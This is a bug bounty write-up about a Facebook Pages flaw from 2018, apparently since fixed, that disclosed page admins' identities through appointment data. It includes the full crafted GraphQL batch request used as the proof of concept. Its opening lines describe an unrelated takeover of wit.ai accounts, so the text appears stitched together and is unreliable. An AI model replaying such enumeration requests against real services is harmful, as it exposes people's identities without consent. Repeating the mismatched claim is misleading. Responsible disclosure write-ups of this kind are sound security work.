Disclose Page Admins via Facebook Appointments
The vulnerability permits an unauthenticated actor to takeover any wit.ai account. The only prerequisite observed is knowledge of the target wit.ai identifier; no additional credentials are required.
Disclose Page Admins via Facebook Appointments
🧾Description
A vulnerability was discovered in Facebook’s Pages product that allowed attackers to disclose appointment details of any page, including the identity of page administrators. By crafting a GraphQL batch request with a target pageID, an attacker could enumerate appointments created by that page and identify the corresponding admins.
⚙️ Steps to Reproduce
Victim Scenario
Victim (page admin of page_a) creates an appointment on their page.
Attacker Steps
The attacker sends a crafted GraphQL batch request:
1
2
3
4
5
6
7
8
POST /api/graphqlbatch/ HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Connection: close
&queries={"o0":{"doc_id":"1735616686561494","query_params":{"pageID":"ID_PAGE_A","startDate":1,"endDate":9999999999999999}}}
Response:
1
The API response contained details of all appointments, including the user who created them (page admins).
Impact
- Attackers could enumerate all appointments of any Facebook Page.
- The response leaked the identity (user ID) of page administrators.
- This disclosure violates admin privacy and could lead to targeted attacks or profiling.
Timeline
- Reported: October 12, 2018
- Triaged: October 15, 2018
- Fixed: October 17, 2018
- Reward: October 17, 2018 - $2000
This post is licensed under CC BY 4.0 by the author.